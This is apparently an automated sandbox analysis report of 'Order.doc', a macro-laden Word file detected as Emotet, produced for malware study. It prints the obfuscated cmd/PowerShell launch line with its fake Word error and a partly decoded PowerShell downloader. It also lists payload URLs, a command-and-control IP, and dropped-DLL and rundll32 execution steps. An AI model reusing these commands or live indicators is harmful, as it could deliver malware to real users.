Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fceveflzqtqcb\xbnmlvxgynlb.uvl',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jonxwll\xztbsp.lei',TJuSeqejTSAKMZ
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jonxwll\xztbsp.lei',#1
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: C:\Windows\symbols\dll\System.pdbom source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: ws\System.pdbpdbtem.pdb\a source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.pdbon.dll source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2090952094.0000000002AB0000.00000002.00000001.sdmp
Source: Binary string: <ystem.pdb source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.pdb5\ source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp

Data Obfuscation:

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Source: Order.doc Stream path 'Macros/VBA/Jlzk8qsqcshl6jk' : High number of GOTO operations
Source: VBA code instrumentation OLE, VBA macro, High number of GOTO operations: Module Jlzk8qsqcshl6jk Name: Jlzk8qsqcshl6jk
Obfuscated command line found
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 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
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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 Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_000007FF0027197C push eax; iretd 5_2_000007FF002719E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0040100B push ss; iretd 7_2_0040100C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024F090 push edx; ret 7_2_0024F237
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0023057F push ss; iretd 7_2_00230580
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00452D98 push 00452E25h; ret 7_2_00452E1D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00460020 push 00460058h; ret 7_2_00460050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00454038 push 00454064h; ret 7_2_0045405C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0042A0B2 push 0042A0E0h; ret 7_2_0042A0D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0042A0B4 push 0042A0E0h; ret 7_2_0042A0D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0042B274 push 0042B2CDh; ret 7_2_0042B2C5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0043C34C push 0043C378h; ret 7_2_0043C370
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0042E450 push ecx; mov dword ptr [esp], edx 7_2_0042E454
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_004604F4 push 0046055Ch; ret 7_2_00460554
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00460498 push 004604EFh; ret 7_2_004604E7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_004605F0 push 0046063Ch; ret 7_2_00460634
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00460580 push 004605ACh; ret 7_2_004605A4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0045B588 push 0045B5CAh; ret 7_2_0045B5C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_004605B8 push 004605E4h; ret 7_2_004605DC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00460654 push 00460680h; ret 7_2_00460678
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_004606C4 push 004606F0h; ret 7_2_004606E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0042D6DC push 0042D751h; ret 7_2_0042D749
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0042E6F0 push ecx; mov dword ptr [esp], edx 7_2_0042E6F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0046068C push 004606B8h; ret 7_2_004606B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0042E696 push ecx; mov dword ptr [esp], edx 7_2_0042E69C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00428748 push 00428774h; ret 7_2_0042876C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0042E750 push ecx; mov dword ptr [esp], edx 7_2_0042E754
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0042D754 push 0042D7ADh; ret 7_2_0042D7A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_004607E4 push 00460827h; ret 7_2_0046081F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00428798 push 004287C4h; ret 7_2_004287BC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_004637A8 push 004637E0h; ret 7_2_004637D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00463848 push 00463874h; ret 7_2_0046386C

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\SysWOW64\rundll32.exe PE file moved: C:\Windows\SysWOW64\Fceveflzqtqcb\xbnmlvxgynlb.uvl

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Fceveflzqtqcb\xbnmlvxgynlb.uvl:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Jonxwll\xztbsp.lei:Zone.Identifier read attributes | delete
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2368 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: rundll32.exe, 00000008.00000002.2095025221.000000000048D000.00000004.00000020.sdmp Binary or memory string: VMware_S
Source: powershell.exe, 00000005.00000002.2089981727.0000000000434000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00403278 mov eax, dword ptr fs:[00000030h] 7_2_00403278
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002327EC mov eax, dword ptr fs:[00000030h] 7_2_002327EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00873278 mov eax, dword ptr fs:[00000030h] 8_2_00873278
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002227EC mov eax, dword ptr fs:[00000030h] 8_2_002227EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E27EC mov eax, dword ptr fs:[00000030h] 9_2_001E27EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00283278 mov eax, dword ptr fs:[00000030h] 10_2_00283278
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002027EC mov eax, dword ptr fs:[00000030h] 10_2_002027EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003727EC mov eax, dword ptr fs:[00000030h] 11_2_003727EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002327EC mov eax, dword ptr fs:[00000030h] 12_2_002327EC
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\rundll32.exe Memory protected: page write copy | page execute | page execute read | page execute and read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 190.55.186.229 80
Encrypted powershell cmdline option found
Source: unknown Process created: Base64 decoded Set DbNM ([TYPe]("{4}{5}{3}{2}{1}{0}"-F 'y','R','o','IRect','sy','Stem.io.d') ); SV 0jA ([typE]("{0}{6}{5}{2}{7}{4}{1}{3}" -F 'SystE','ANA','SERv','GeR','OIntm','T.','m.nE','Icep') ) ; $Orb_ch2=$M41B + [char](33) + $G08C;$E50N=(('A'+'55')+'X'); ( ls vArIABle:dBNm ).VAlUe::"CR`Ea`TedIrec`T`ory"($HOME + (('B'+'d'+'0'+('Cha1'+'_5'+'jBd0'+'P')+('z'+'yr')+'xy'+('vBd'+'0'))."Re`PLa`Ce"(([cHar]66+[cHar]100+[cHar]48),[stRInG][cHar]92)));$P46J=('O'+('5'+'_H')); $0jA::"SECU`RiTyPrOt`O`COL" = ('Tl'+('s'+'12'));$V00N=(('U'+'28')+'G');$Fetacwc = ('J'+('47'+'K'));$X61D=('C'+('3'+'9S'));$Qf_z66t=$HOME+(('na'+'UC'+'h'+'a1'+('_'+'5j')+('naU'+'Pzyrxyv'+'naU'))."r`ePlaCe"(([cHAR]110+[cHAR]97+[cHAR]85),'\'))+$Fetacwc+'.d' + 'll';$D98A=('U0'+'5N');$Fl6bw0c='h' + 'tt' + 'p';$Del7wfy=(('n'+'s wu d'+'b nd:'+'//')+'n'+('ightl'+'i')+('f'+'em')+('um'+'b')+('ai.'+'club/x'+'/0wBD3'+'/')+('!ns w'+'u ')+('db n'+'ds://'+'s')+'h'+('o'+'p.now'+'fal.'+'dev')+('/wp-'+'i')+('nc'+'lud'+'es')+'/R'+'lM'+('Obf2j'+'0'+'/!ns')+(' wu'+' d')+('b '+'n')+'d:'+('//e-w'+'de')+('s'+'ign')+('.eu'+'/wp-c'+'on'+'tent/bn1Ig'+'Dejh/!'+'n'+'s '+'wu '+'d'+'b')+' '+('nd'+':')+('//traumfraue'+'n'+'-u'+'kraine'+'.d'+'e/')+'b'+('in/Jye'+'S/!ns '+'wu '+'d')+'b'+(' n'+'d')+('s'+'://jfl'+'mktg.wpc'+'o'+'m'+'sta')+'gi'+'n'+'g'+('.com'+'/wp')+('-co'+'n')+('ten'+'t/')+'A'+'K'+'/'+'!n'+('s'+' wu '+'db'+' nds://li')+('nhki'+'enma'+'yt'+'i')+('nh'+'.')+'t'+'c'+('te'+'du.com'+'/')+'w'+('p-sna'+'ps'+'hot'+'s/VzJM/'))."r`EpL`ACE"(
Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded Set DbNM ([TYPe]("{4}{5}{3}{2}{1}{0}"-F 'y','R','o','IRect','sy','Stem.io.d') ); SV 0jA ([typE]("{0}{6}{5}{2}{7}{4}{1}{3}" -F 'SystE','ANA','SERv','GeR','OIntm','T.','m.nE','Icep') ) ; $Orb_ch2=$M41B + [char](33) + $G08C;$E50N=(('A'+'55')+'X'); ( ls vArIABle:dBNm ).VAlUe::"CR`Ea`TedIrec`T`ory"($HOME + (('B'+'d'+'0'+('Cha1'+'_5'+'jBd0'+'P')+('z'+'yr')+'xy'+('vBd'+'0'))."Re`PLa`Ce"(([cHar]66+[cHar]100+[cHar]48),[stRInG][cHar]92)));$P46J=('O'+('5'+'_H')); $0jA::"SECU`RiTyPrOt`O`COL" = ('Tl'+('s'+'12'));$V00N=(('U'+'28')+'G');$Fetacwc = ('J'+('47'+'K'));$X61D=('C'+('3'+'9S'));$Qf_z66t=$HOME+(('na'+'UC'+'h'+'a1'+('_'+'5j')+('naU'+'Pzyrxyv'+'naU'))."r`ePlaCe"(([cHAR]110+[cHAR]97+[cHAR]85),'\'))+$Fetacwc+'.d' + 'll';$D98A=('U0'+'5N');$Fl6bw0c='h' + 'tt' + 'p';$Del7wfy=(('n'+'s wu d'+'b nd:'+'//')+'n'+('ightl'+'i')+('f'+'em')+('um'+'b')+('ai.'+'club/x'+'/0wBD3'+'/')+('!ns w'+'u ')+('db n'+'ds://'+'s')+'h'+('o'+'p.now'+'fal.'+'dev')+('/wp-'+'i')+('nc'+'lud'+'es')+'/R'+'lM'+('Obf2j'+'0'+'/!ns')+(' wu'+' d')+('b '+'n')+'d:'+('//e-w'+'de')+('s'+'ign')+('.eu'+'/wp-c'+'on'+'tent/bn1Ig'+'Dejh/!'+'n'+'s '+'wu '+'d'+'b')+' '+('nd'+':')+('//traumfraue'+'n'+'-u'+'kraine'+'.d'+'e/')+'b'+('in/Jye'+'S/!ns '+'wu '+'d')+'b'+(' n'+'d')+('s'+'://jfl'+'mktg.wpc'+'o'+'m'+'sta')+'gi'+'n'+'g'+('.com'+'/wp')+('-co'+'n')+('ten'+'t/')+'A'+'K'+'/'+'!n'+('s'+' wu '+'db'+' nds://li')+('nhki'+'enma'+'yt'+'i')+('nh'+'.')+'t'+'c'+('te'+'du.com'+'/')+'w'+('p-sna'+'ps'+'hot'+'s/VzJM/'))."r`EpL`ACE"(
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fceveflzqtqcb\xbnmlvxgynlb.uvl',CnBGell
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fceveflzqtqcb\xbnmlvxgynlb.uvl',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jonxwll\xztbsp.lei',TJuSeqejTSAKMZ
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jonxwll\xztbsp.lei',#1
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 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
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Emotet
Source: Yara match File source: 00000008.00000002.2094913747.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2092409320.0000000000230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2098118909.0000000000320000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2098009043.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2092516972.00000000002F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2097063566.0000000000210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2336211532.0000000000260000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2097445507.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2101634327.0000000000720000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2092704885.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2096952501.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2336195679.0000000000230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2101426694.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2098032897.0000000000280000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2095103110.0000000000870000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2101331684.0000000000370000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2094951149.00000000002F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2336233664.00000000002D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 10.2.rundll32.exe.320000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.280000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.260000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.720000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.2f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.3a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.320000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.720000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.2f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.870000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.3a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.2f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.260000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.2f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.280000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.870000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2d0000.1.unpack, type: UNPACKEDPE

Behavior Graph (figure; only the node labels are recoverable here): ID 344065, Sample: Order.doc, Start date: 25/01/2021, Architecture: WINDOWS, Score: 100. The sample starts cmd.exe and WINWORD.EXE (WINWORD.EXE drops C:\Users\user\Desktop\~$Order.doc, data). cmd.exe starts msg.exe and powershell.exe and is flagged "Suspicious powershell command line found", "Very long command line found" and "Encrypted powershell cmdline option found". powershell.exe contacts nightlifemumbai.club (172.217.6.174, ports 49165 and 80, GOOGLEUS, United States) and shop.nowfal.dev (104.21.88.166, ports 443 and 49166, CLOUDFLARENETUS, United States), drops C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll (PE32, "Powershell drops PE file") and starts rundll32.exe. A chain of seven rundll32.exe processes follows; two of them are flagged "Hides that the sample has been downloaded from the Internet (zone.identifier)", and the last connects to 190.55.186.229 (ports 49167 and 80, TelecentroSAAR, Argentina), flagged "System process connects to network (likely due to code injection or exploit)". Root-level signatures shown: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules), Antivirus detection for URL or domain, Multi AV Scanner detection for dropped file, and 13 other signatures.

Contacted Public IPs

IP | Domain | Country | ASN | ASN Name | Malicious
104.21.88.166 | unknown | United States | 13335 | CLOUDFLARENETUS | true
172.217.6.174 | unknown | United States | 15169 | GOOGLEUS | true
190.55.186.229 | unknown | Argentina | 27747 | TelecentroSAAR | true

Contacted Domains

Name | IP | Active
shop.nowfal.dev | 104.21.88.166 | true
nightlifemumbai.club | 172.217.6.174 | true

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://nightlifemumbai.club/x/0wBD3/ | true | 5% (Virustotal); Avira URL Cloud: malware | unknown
http://190.55.186.229/efl8dd1i/ | true | Avira URL Cloud: safe | unknown